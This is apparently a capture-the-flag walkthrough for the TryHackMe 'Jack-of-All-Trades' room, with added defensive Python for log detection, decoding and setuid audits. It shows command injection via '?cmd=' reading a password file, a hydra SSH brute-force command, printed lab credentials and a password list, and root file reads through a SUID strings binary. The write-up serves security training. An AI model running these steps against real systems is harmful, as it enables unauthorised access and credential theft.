# Writeup [Jack-of-All-Trades](https://tryhackme.com/room/jackofalltrades)
>After getting a connection, let's search for the open ports.
#### Nmap
>***==nmap -sV -p- -vv <ip>==***
```
22/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
| 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
| 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_ 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
```
>It seems interesting that `http` is running on port `22` and `ssh` is running on port `80`.
>Now when we try to open port 22 in the browser, it gives us a warning and says the port is restricted.
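Swapped services like the ones above are exactly what a scan review should flag automatically rather than rely on someone noticing. The following Python is an added example, not part of the original writeup: it parses the port table from nmap's normal output and reports every open port whose fingerprinted service differs from the service that port normally carries. The `DEFAULT_SERVICE` table is an assumption of the example, and the sample text is the scan output shown above.

```python
import re
from typing import NamedTuple

# Port-table lines copied from the nmap output above (script lines starting
# with "|" are kept to show the parser skips them).
NMAP_OUTPUT = """\
22/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
"""

# <port>/<proto> <state> <service> [version banner]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Service each port is normally assigned. This table is an assumption of the
# example, not something nmap reports; extend it for your own environment.
DEFAULT_SERVICE = {
    21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 53: "domain",
    80: "http", 110: "pop3", 143: "imap", 443: "https", 3306: "mysql",
}


class PortEntry(NamedTuple):
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_ports(text: str) -> list:
    """Return one PortEntry per port-table line; NSE script lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            entries.append(PortEntry(int(port), proto, state, service, version.strip()))
    return entries


def find_service_mismatches(entries, expected=DEFAULT_SERVICE) -> list:
    """Return (port, fingerprinted service, usual service) for each open port
    whose -sV fingerprint disagrees with the service normally found there."""
    mismatches = []
    for e in entries:
        if e.state != "open":
            continue
        usual = expected.get(e.port)
        if usual is not None and e.service != usual:
            mismatches.append((e.port, e.service, usual))
    return mismatches


if __name__ == "__main__":
    for port, seen, usual in find_service_mismatches(parse_nmap_ports(NMAP_OUTPUT)):
        print(f"port {port}: fingerprinted as {seen}, usually {usual}")
```

Because `-sV` identifies the service from its banner rather than from the port number, the comparison catches services deliberately moved to unusual ports, which is a useful asset-inventory check on your own hosts as much as a CTF hint.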

For that there is [documentation](https://support.mozilla.org/en-US/questions/1083282) on the internet on how to bypass it.
>Here in `about:config`, search for `network.security.ports.banned.override` in the search tab, choose `new -> String` and add port `22` as its value.

>Now go back to the webpage and click reload. It now loads properly.
>We see the webpage but don't get any useful information, so let's check the `page source`.

>There we have a comment telling us about `/recovery.php` and some encoded comment. Let's check both of them.
>First the encoded message

Here we get a name in `Johny Graves well with his crypto jobhunting!` and a `Password`.
>Being curious, let's search for `Johny graves crypto jobhunting`. There we find something.

>Now let's go to the `/recovery.php` page

It seems to be a login page where a user resets their password.
Now let's check its `page source`

>Again we have a long encoded message.
Try to decode it using `cyberchef` with the method used by `Johny graves`:

>Decode from `base32`

>Decode from `hex`

>Now at last decode from `Rot13`
>We get
```
Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S
```
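The three CyberChef steps above are a fixed chain, so they are worth writing down once as code. The following Python is an added example, not part of the original writeup: `layered_decode` applies exactly the Base32, hex and ROT13 steps described above, `layered_encode` is its mirror image (used here only to build test input), and `peel_layers` guesses each layer from its alphabet so the same script handles a message whose layer order is not known in advance. The short sample messages are constructed for the example; the heuristics in `peel_layers` are an assumption of the example.

```python
import base64
import codecs

BASE32_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=")
HEX_ALPHABET = set("0123456789abcdefABCDEF")


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so one function serves both directions."""
    return codecs.encode(text, "rot_13")


def layered_encode(plaintext: str) -> str:
    """Build a message the way the author had to undo it: ROT13 first,
    then hex, then Base32 (decoding runs the steps in reverse)."""
    rotated = rot13(plaintext)
    hex_text = rotated.encode("utf-8").hex()
    return base64.b32encode(hex_text.encode("ascii")).decode("ascii")


def layered_decode(blob: str) -> str:
    """Explicit decode chain: Base32 -> hex -> ROT13, as done in CyberChef above."""
    hex_text = base64.b32decode(blob.strip()).decode("ascii")
    rotated = bytes.fromhex(hex_text).decode("utf-8")
    return rot13(rotated)


def looks_like_base32(s: str) -> bool:
    # Base32 output is upper-case A-Z and 2-7, padded with "=" to a multiple of 8.
    return s != "" and len(s) % 8 == 0 and set(s) <= BASE32_ALPHABET


def looks_like_hex(s: str) -> bool:
    return s != "" and len(s) % 2 == 0 and set(s) <= HEX_ALPHABET


def peel_layers(blob: str, max_layers: int = 3):
    """Strip encodings by alphabet heuristics and record each step taken.
    The heuristics are an assumption of this example: a plaintext made only of
    hex digits (or of A-Z/2-7) would be mis-detected as another layer, which is
    why the loop is capped and the step list is returned for the caller to review."""
    steps = []
    current = blob.strip()
    for _ in range(max_layers):
        if looks_like_base32(current):
            current = base64.b32decode(current).decode("ascii")
            steps.append("base32")
        elif looks_like_hex(current):
            current = bytes.fromhex(current).decode("utf-8")
            steps.append("hex")
        else:
            # Nothing structural left to strip; ROT13 is the final, alphabet-only layer.
            current = rot13(current)
            steps.append("rot13")
            break
    return steps, current


if __name__ == "__main__":
    # Constructed sample: the plaintext "ab" after the three encoding layers.
    sample = layered_encode("ab")
    print(sample, "->", layered_decode(sample), peel_layers(sample))
```

Encodings like these hide nothing from anyone who looks, which is the real lesson of the room's "crypto" hints: an encoding is reversible by construction, so it is not a substitute for keeping credentials out of page sources and images in the first place.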
Going to the link provided in the message, we find the `Stegosauria` site, which obviously suggests steganography.

>Let's check the images provided on the home page of the jack-of-all-trades site.
>There we have 3 photos. Let's use `steghide` with the password that we found to check what's inside them.
Download and check all three images one by one. We don't find anything in the last 2 photos, but we get something in the header image:
***==steghide extract -sf header.jpg==***

```
Here you go Jack. Good thing you thought ahead!
Username: jackinthebox
Password: TplFxiSHjY
```
Now we can log in at `/recovery.php`.

>It is asking us to send a command.
>Try adding `?cmd=id` to the end of the URL:

We find `jacks_password_list` in it.
Now by running
`?cmd=cat /home/jack_password_list` we get
```
*hclqAzj+2GC+=0K
eN<A@n^zI?FE$I5,
X<(@zo2XrEN)#MGC
,,aE1K,nW3Os,afb
ITMJpGGIqg1jn?>@
0HguX{,fgXPE;8yF
sjRUb4*@pz<*ZITu
[8V7o^gl(Gjt5[WB
yTq0jI$d}Ka<T}PD
Sc.[[2pL<>e)vC4}
9;}#q*,A4wd{<X.T
M41nrFt#PcV=(3%p
GZx.t)H$&awU;SO<
.MVettz]a;&Z;cAC
2fh%i9Pr5YiYIf51
TDF@mdEd3ZQ(]hBO
v]XBmwAk8vk5t3EF
9iYZeZGQGG9&W4d1
8TIFce;KjrBWTAY^
SeUAwt7EB#fY&+yt
n.FZvJ.x9sYe5s5d
8lN{)g32PG,1?[pM
z@e1PmlmQ%k5sDz@
ow5APF>6r,y4krSo
```
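Every one of the `?cmd=` requests above lands in the web server's access log, so this is a good point to show how they look from the other side. The following Python is an added example, not part of the original writeup: it parses Apache combined-format log lines and reports requests whose query string carries a command-like parameter, decoding the percent-encoding so the command reads as typed. The log lines are constructed for the example (client address, timestamps and sizes are made up), modelled on the two requests shown above; the `exec` and `command` parameter names are assumptions added alongside the page's `cmd`.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines (not from the room): one ordinary page
# load and two requests carrying the cmd= parameter seen in the writeup.
SAMPLE_LOG = """\
10.10.14.7 - - [12/May/2020:10:01:02 +0000] "GET /recovery.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.10.14.7 - - [12/May/2020:10:01:30 +0000] "GET /recovery.php?cmd=id HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.7 - - [12/May/2020:10:02:11 +0000] "GET /recovery.php?cmd=cat%20/home/jack_password_list HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# client ident user [timestamp] "METHOD target PROTO" status size (referer/UA ignored)
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) \S+'
)

# Parameter names treated as command carriers. "cmd" is the one the page shows;
# the others are assumptions of the example.
COMMAND_PARAMS = ("cmd", "exec", "command")


def parse_access_log(text: str):
    """Yield one dict of named fields per parseable combined-log line."""
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            yield m.groupdict()


def flag_command_params(text: str, params=COMMAND_PARAMS) -> list:
    """Return (client, path, parameter, decoded value, status) for every request
    whose query string carries one of the command-like parameters."""
    hits = []
    for rec in parse_access_log(text):
        parts = urlsplit(rec["target"])
        # parse_qs undoes percent-encoding, so "cat%20/home/x" is reported as "cat /home/x".
        query = parse_qs(parts.query, keep_blank_values=True)
        for name in params:
            for value in query.get(name, []):
                hits.append((rec["client"], parts.path, name, value, int(rec["status"])))
    return hits


if __name__ == "__main__":
    for client, path, name, value, status in flag_command_params(SAMPLE_LOG):
        print(f"{client} {path} {name}={value!r} -> {status}")
```

A 200 response to a request like the third line is the signal worth alerting on: the parameter name alone would also match harmless pages, but a successful read of a file under `/home` through a web script is not something a recovery page should ever do.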
Let's crack the password using hydra on user `jack` at the `ssh` port `80`:
***==hydra -l jack -P <password.txt> -s 80 ssh://<ip>==***

> Now let's log in via ssh
***==ssh -p 80 jack@<ip>==***

There we find `user.jpg`.

Here we get the first flag!!
#### Now Becoming root
Let's find binaries with the `SUID` bit set:
***==find / -perm /4000 2>/dev/null==***

There we find `/usr/bin/strings` with the SUID bit set,
which can be used to read the data in `/root/root.txt`:
***==/usr/bin/strings /root/root.txt==***
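The `find / -perm /4000` step above is the same check an administrator should run on a regular schedule, with the difference that the result is compared against a known-good list instead of read by eye. The following Python is an added example, not part of the original writeup: `find_setuid` walks the filesystem the way the `find` command does, and `unexpected_setuid` reports anything not in a baseline of setuid binaries a stock install is expected to carry. The `BASELINE_SETUID` set is an assumption of the example (build yours from a clean image of the same release); a setuid `strings`, as found on this box, would show up as unexpected.

```python
import os
import stat

# Setuid binaries a stock Debian install normally carries. This baseline is an
# assumption of the example; generate the real one from a known-good machine.
BASELINE_SETUID = {
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/sudo", "/bin/su", "/bin/mount", "/bin/umount",
}

# Pseudo-filesystems that only add noise to the walk.
SKIP_DIRS = ("/proc", "/sys", "/dev")


def is_setuid_mode(mode: int) -> bool:
    """True for a regular file whose mode carries the setuid bit (the 4 in 4755).
    Directories with the bit set are not setuid programs and are ignored."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_setuid(root: str = "/") -> list:
    """Equivalent of `find / -perm /4000 2>/dev/null`: symlinks are not followed
    and unreadable directories are skipped instead of aborting the walk."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_setuid_mode(st.st_mode):
                found.append(path)
    return sorted(found)


def unexpected_setuid(paths, baseline=BASELINE_SETUID) -> list:
    """Setuid files absent from the baseline: the ones to investigate, since a
    setuid copy of any file reader lets every local user read root's files."""
    return sorted(p for p in paths if p not in baseline)


if __name__ == "__main__":
    for p in unexpected_setuid(find_setuid("/")):
        print("unexpected setuid binary:", p)
```

Running this from a package-integrity job (or diffing its output against the previous run) turns the privilege-escalation step in this room into a finding that appears before anyone uses it.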

>So there we get the final root flag!!! :))